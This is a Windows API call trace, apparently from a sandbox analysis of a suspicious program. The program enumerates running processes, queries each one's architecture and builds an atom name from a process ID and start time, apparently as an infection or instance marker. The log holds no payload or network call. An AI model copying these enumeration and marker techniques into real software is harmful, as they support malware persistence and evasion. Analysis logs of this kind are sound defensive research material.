	[0075.698] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.698] CloseHandle (hObject=0x224) returned 1
	[0075.698] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sihost.exe", cchWideChar=10, lpMultiByteStr=0x772200, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 10
	[0075.698] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0075.698] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0075.698] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0075.698] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=20, lpMultiByteStr=0x728a58, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 20
	[0075.698] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x224
	[0075.698] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.698] CloseHandle (hObject=0x224) returned 1
	[0075.698] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="RuntimeBroker.exe", cchWideChar=17, lpMultiByteStr=0x728a98, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 17
	[0075.698] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0075.698] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772170, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0075.698] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x224
	[0075.698] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.699] CloseHandle (hObject=0x224) returned 1
	[0075.699] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x772188, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0075.699] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x224
	[0075.699] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.699] CloseHandle (hObject=0x224) returned 1
	[0075.699] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="explorer.exe", cchWideChar=12, lpMultiByteStr=0x772200, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 12
	[0075.699] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x224
	[0075.699] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.699] CloseHandle (hObject=0x224) returned 1
	[0075.699] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x772200, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0075.699] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x224
	[0075.699] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.699] CloseHandle (hObject=0x224) returned 1
	[0075.699] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=23, lpMultiByteStr=0x728a18, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 23
	[0075.699] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x224
	[0075.699] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.699] CloseHandle (hObject=0x224) returned 1
	[0075.700] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SearchUI.exe", cchWideChar=12, lpMultiByteStr=0x772158, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 12
	[0075.700] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x224
	[0075.700] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.700] CloseHandle (hObject=0x224) returned 1
	[0075.700] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dllhost.exe", cchWideChar=11, lpMultiByteStr=0x7721d0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0075.700] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0075.700] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="audiodg.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 11
	[0075.700] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x224
	[0075.700] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.700] CloseHandle (hObject=0x224) returned 1
	[0075.700] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x7721a0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0075.700] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x224
	[0075.700] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.700] CloseHandle (hObject=0x224) returned 1
	[0075.700] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0075.700] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x224
	[0075.700] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.701] CloseHandle (hObject=0x224) returned 1
	[0075.701] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="backgroundTaskHost.exe", cchWideChar=22, lpMultiByteStr=0x728858, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="backgroundTaskHost.exe", lpUsedDefaultChar=0x0) returned 22
	[0075.701] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xddc) returned 0x0
	[0075.701] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x772158, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0075.701] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x224
	[0075.701] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.701] CloseHandle (hObject=0x224) returned 1
	[0075.701] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="develop-patent.exe", cchWideChar=18, lpMultiByteStr=0x7288b8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="develop-patent.exe", lpUsedDefaultChar=0x0) returned 18
	[0075.701] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x224
	[0075.701] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.701] CloseHandle (hObject=0x224) returned 1
	[0075.701] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="its.exe", cchWideChar=7, lpMultiByteStr=0x72dcf0, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="its.exe", lpUsedDefaultChar=0x0) returned 7
	[0075.701] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x224
	[0075.701] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.701] CloseHandle (hObject=0x224) returned 1
	[0075.701] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="gently budapest.exe", cchWideChar=19, lpMultiByteStr=0x728958, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gently budapest.exe", lpUsedDefaultChar=0x0) returned 19
	[0075.702] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x224
	[0075.702] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.702] CloseHandle (hObject=0x224) returned 1
	[0075.702] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="thoroughlypriestprefix.exe", cchWideChar=26, lpMultiByteStr=0x72ea18, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thoroughlypriestprefix.exe", lpUsedDefaultChar=0x0) returned 26
	[0075.702] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x224
	[0075.702] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.702] CloseHandle (hObject=0x224) returned 1
	[0075.702] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="inserted_field.exe", cchWideChar=18, lpMultiByteStr=0x728958, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="inserted_field.exe", lpUsedDefaultChar=0x0) returned 18
	[0075.702] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x224
	[0075.702] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.702] CloseHandle (hObject=0x224) returned 1
	[0075.702] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="semi bay.exe", cchWideChar=12, lpMultiByteStr=0x772200, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="semi bay.exe", lpUsedDefaultChar=0x0) returned 12
	[0075.702] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x224
	[0075.702] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.702] CloseHandle (hObject=0x224) returned 1
	[0075.702] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="outdoor.exe", cchWideChar=11, lpMultiByteStr=0x7721a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outdoor.exe", lpUsedDefaultChar=0x0) returned 11
	[0075.702] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x224
	[0075.702] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.702] CloseHandle (hObject=0x224) returned 1
	[0075.703] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wool-parish-horses.exe", cchWideChar=22, lpMultiByteStr=0x7289f8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wool-parish-horses.exe", lpUsedDefaultChar=0x0) returned 22
	[0075.703] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x224
	[0075.703] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.703] CloseHandle (hObject=0x224) returned 1
	[0075.703] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoken-delayed.exe", cchWideChar=18, lpMultiByteStr=0x7287f8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoken-delayed.exe", lpUsedDefaultChar=0x0) returned 18
	[0075.703] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x224
	[0075.703] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.703] CloseHandle (hObject=0x224) returned 1
	[0075.703] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spokesman.exe", cchWideChar=13, lpMultiByteStr=0x772200, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spokesman.exe", lpUsedDefaultChar=0x0) returned 13
	[0075.703] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x224
	[0075.703] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.703] CloseHandle (hObject=0x224) returned 1
	[0075.703] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="oxide.exe", cchWideChar=9, lpMultiByteStr=0x772218, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oxide.exe", lpUsedDefaultChar=0x0) returned 9
	[0075.703] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x224
	[0075.703] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.703] CloseHandle (hObject=0x224) returned 1
	[0075.703] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="off-covered-playlist.exe", cchWideChar=24, lpMultiByteStr=0x72e888, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="off-covered-playlist.exe", lpUsedDefaultChar=0x0) returned 24
	[0075.703] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x224
	[0075.703] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.704] CloseHandle (hObject=0x224) returned 1
	[0075.704] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bryant.exe", cchWideChar=10, lpMultiByteStr=0x7721b8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bryant.exe", lpUsedDefaultChar=0x0) returned 10
	[0075.704] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x224
	[0075.704] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.704] CloseHandle (hObject=0x224) returned 1
	[0075.704] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="postal-fool.exe", cchWideChar=15, lpMultiByteStr=0x772218, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="postal-fool.exe", lpUsedDefaultChar=0x0) returned 15
	[0075.704] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x224
	[0075.704] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.704] CloseHandle (hObject=0x224) returned 1
	[0075.704] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="crm_remarks_ctrl.exe", cchWideChar=20, lpMultiByteStr=0x728958, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="crm_remarks_ctrl.exe", lpUsedDefaultChar=0x0) returned 20
	[0075.704] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x224
	[0075.704] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.704] CloseHandle (hObject=0x224) returned 1
	[0075.704] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="volunteer.exe", cchWideChar=13, lpMultiByteStr=0x7721a0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="volunteer.exe", lpUsedDefaultChar=0x0) returned 13
	[0075.704] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x224
	[0075.704] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.704] CloseHandle (hObject=0x224) returned 1
	[0075.704] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ranger_tu_community.exe", cchWideChar=23, lpMultiByteStr=0x728978, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ranger_tu_community.exe", lpUsedDefaultChar=0x0) returned 23
	[0075.704] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x224
	[0075.705] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.705] CloseHandle (hObject=0x224) returned 1
	[0075.705] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="eddie_cholesterol_reprint.exe", cchWideChar=29, lpMultiByteStr=0x72e838, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eddie_cholesterol_reprint.exe", lpUsedDefaultChar=0x0) returned 29
	[0075.705] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x224
	[0075.705] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.705] CloseHandle (hObject=0x224) returned 1
	[0075.705] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bracket-natural-chancellor.exe", cchWideChar=30, lpMultiByteStr=0x72ea18, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bracket-natural-chancellor.exe", lpUsedDefaultChar=0x0) returned 30
	[0075.705] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0075.705] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.705] CloseHandle (hObject=0x224) returned 1
	[0075.705] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="safari.exe", cchWideChar=10, lpMultiByteStr=0x7721a0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="safari.exe", lpUsedDefaultChar=0x0) returned 10
	[0075.705] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0075.705] GetLastError () returned 0x5
	[0075.705] GetLastError () returned 0x5
	[0075.705] GetLastError () returned 0x5
	[0075.705] GetLastError () returned 0x5
	[0075.705] GetLastError () returned 0x5
	[0075.705] GetLastError () returned 0x5
	[0075.705] GetLastError () returned 0x5
	[0075.705] GetLastError () returned 0x5
	[0075.705] GetLastError () returned 0x5
	[0075.705] GetLastError () returned 0x5
	[0075.705] GetLastError () returned 0x5
	[0075.705] GetLastError () returned 0x5
	[0075.705] GetLastError () returned 0x5
	[0075.705] GetLastError () returned 0x5
	[0075.705] GetLastError () returned 0x5
	[0075.705] GetLastError () returned 0x5
	[0075.705] GetLastError () returned 0x5
	[0075.705] GetLastError () returned 0x5
	[0075.705] GetLastError () returned 0x5
	[0075.705] GetLastError () returned 0x5
	[0075.706] GetLastError () returned 0x5
	[0075.706] GetLastError () returned 0x5
	[0075.706] GetLastError () returned 0x5
	[0075.706] GetLastError () returned 0x5
	[0075.706] GetLastError () returned 0x5
	[0075.706] GetLastError () returned 0x5
	[0075.706] GetLastError () returned 0x5
	[0075.706] GetLastError () returned 0x5
	[0075.706] GetLastError () returned 0x5
	[0075.706] GetLastError () returned 0x5
	[0075.706] GetLastError () returned 0x5
	[0075.706] GetLastError () returned 0x5
	[0075.706] GetLastError () returned 0x5
	[0075.706] GetLastError () returned 0x5
	[0075.706] GetLastError () returned 0x5
	[0075.706] GetLastError () returned 0x5
	[0075.706] GetLastError () returned 0x5
	[0075.706] GetLastError () returned 0x5
	[0075.706] GetLastError () returned 0x5
	[0075.706] GetLastError () returned 0x5
	[0075.706] GetLastError () returned 0x5
	[0075.706] GetLastError () returned 0x5
	[0075.706] GetLastError () returned 0x5
	[0075.706] GetLastError () returned 0x5
	[0075.706] GetLastError () returned 0x5
	[0075.706] GetLastError () returned 0x5
	[0075.706] GetLastError () returned 0x5
	[0075.706] GetLastError () returned 0x5
	[0075.706] GetLastError () returned 0x5
	[0075.706] GetLastError () returned 0x5
	[0075.706] GetLastError () returned 0x5
	[0075.706] GetLastError () returned 0x5
	[0075.706] GetLastError () returned 0x5
	[0075.706] GetLastError () returned 0x5
	[0075.706] GetLastError () returned 0x5
	[0075.706] GetLastError () returned 0x5
	[0075.706] GetLastError () returned 0x5
	[0075.706] GetLastError () returned 0x5
	[0075.706] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0075.706] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0075.706] GetProcessTimes (in: hProcess=0x224, lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4 | out: lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4) returned 1
	[0075.707] GetLastError () returned 0x5
	[0075.707] GetLastError () returned 0x5
	[0075.707] GetLastError () returned 0x5
	[0075.707] GetLastError () returned 0x5
	[0075.707] GetLastError () returned 0x5
	[0075.707] GetLastError () returned 0x5
	[0075.707] GetLastError () returned 0x5
	[0075.707] GetLastError () returned 0x5
	[0075.707] GetLastError () returned 0x5
	[0075.707] GetLastError () returned 0x5
	[0075.707] GetLastError () returned 0x5
	[0075.707] GetLastError () returned 0x5
	[0075.707] GetLastError () returned 0x5
	[0075.707] GetLastError () returned 0x5
	[0075.707] GetLastError () returned 0x5
	[0075.707] GetLastError () returned 0x5
	[0075.707] GetLastError () returned 0x5
	[0075.707] GetLastError () returned 0x5
	[0075.707] GetLastError () returned 0x5
	[0075.707] GetLastError () returned 0x5
	[0075.707] GetLastError () returned 0x5
	[0075.707] GetLastError () returned 0x5
	[0075.707] GetLastError () returned 0x5
	[0075.707] GetLastError () returned 0x5
	[0075.707] GetLastError () returned 0x5
	[0075.707] GetLastError () returned 0x5
	[0075.707] wsprintfA (in: param_1=0x710e08, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0075.707] GetLastError () returned 0x5
	[0075.707] GetLastError () returned 0x5
	[0075.707] GetLastError () returned 0x5
	[0075.707] GetLastError () returned 0x5
	[0075.707] GetLastError () returned 0x5
	[0075.707] GetLastError () returned 0x5
	[0075.707] GetLastError () returned 0x5
	[0075.707] GetLastError () returned 0x5
	[0075.707] GetLastError () returned 0x5
	[0075.707] GetLastError () returned 0x5
	[0075.707] GetLastError () returned 0x5
	[0075.707] GetLastError () returned 0x5
	[0075.707] GetLastError () returned 0x5
	[0075.707] GetLastError () returned 0x5
	[0075.707] GetLastError () returned 0x5
	[0075.707] GetLastError () returned 0x5
	[0075.707] GetLastError () returned 0x5
	[0075.707] GetLastError () returned 0x5
	[0075.707] GetLastError () returned 0x5
	[0075.707] GetLastError () returned 0x5
	[0075.707] GetLastError () returned 0x5
	[0075.707] GetLastError () returned 0x5
	[0075.707] GetLastError () returned 0x5
	[0075.707] GetLastError () returned 0x5
	[0075.707] GetLastError () returned 0x5
	[0075.707] GetLastError () returned 0x5
	[0075.708] GetLastError () returned 0x5
	[0075.708] GetLastError () returned 0x5
	[0075.708] GetLastError () returned 0x5
	[0075.708] GetLastError () returned 0x5
	[0075.708] GetLastError () returned 0x5
	[0075.708] GetLastError () returned 0x5
	[0075.708] GetLastError () returned 0x5
	[0075.708] GetLastError () returned 0x5
	[0075.708] GetLastError () returned 0x5
	[0075.708] GetLastError () returned 0x5
	[0075.708] GetLastError () returned 0x5
	[0075.708] GetLastError () returned 0x5
	[0075.708] GetLastError () returned 0x5
	[0075.708] GetLastError () returned 0x5
	[0075.708] GetLastError () returned 0x5
	[0075.708] GetLastError () returned 0x5
	[0075.708] GetLastError () returned 0x5
	[0075.708] GetLastError () returned 0x5
	[0075.708] GetLastError () returned 0x5
	[0075.708] GetLastError () returned 0x5
	[0075.708] GetLastError () returned 0x5
	[0075.708] GetLastError () returned 0x5
	[0075.708] GetLastError () returned 0x5
	[0075.708] GetLastError () returned 0x5
	[0075.708] GetLastError () returned 0x5
	[0075.708] GetLastError () returned 0x5
	[0075.708] GetLastError () returned 0x5
	[0075.708] GetLastError () returned 0x5
	[0075.708] GetLastError () returned 0x5
	[0075.708] GetLastError () returned 0x5
	[0075.708] GetLastError () returned 0x5
	[0075.708] GetLastError () returned 0x5
	[0075.708] GetLastError () returned 0x5
	[0075.708] GetLastError () returned 0x5
	[0075.708] GetLastError () returned 0x5
	[0075.708] GetLastError () returned 0x5
	[0075.708] GetLastError () returned 0x5
	[0075.708] GetLastError () returned 0x5
	[0075.708] GetLastError () returned 0x5
	[0075.708] GetLastError () returned 0x5
	[0075.708] GetLastError () returned 0x5
	[0075.708] GetLastError () returned 0x5
	[0075.708] GetLastError () returned 0x5
	[0075.708] GetLastError () returned 0x5
	[0075.708] GetLastError () returned 0x5
	[0075.708] GetLastError () returned 0x5
	[0075.708] GetLastError () returned 0x5
	[0075.708] GetLastError () returned 0x5
	[0075.708] GetLastError () returned 0x5
	[0075.708] GetLastError () returned 0x5
	[0075.708] GetLastError () returned 0x5
	[0075.708] GetLastError () returned 0x5
	[0075.708] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0075.709] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0075.709] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0075.709] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0075.709] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc000
	[0075.709] CloseHandle (hObject=0x224) returned 1
	[0075.709] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0075.709] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WmiPrvSE.exe", cchWideChar=12, lpMultiByteStr=0x772218, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WmiPrvSE.exe", lpUsedDefaultChar=0x0) returned 12
	[0075.709] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x37c) returned 0x224
	[0075.709] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.709] CloseHandle (hObject=0x224) returned 1
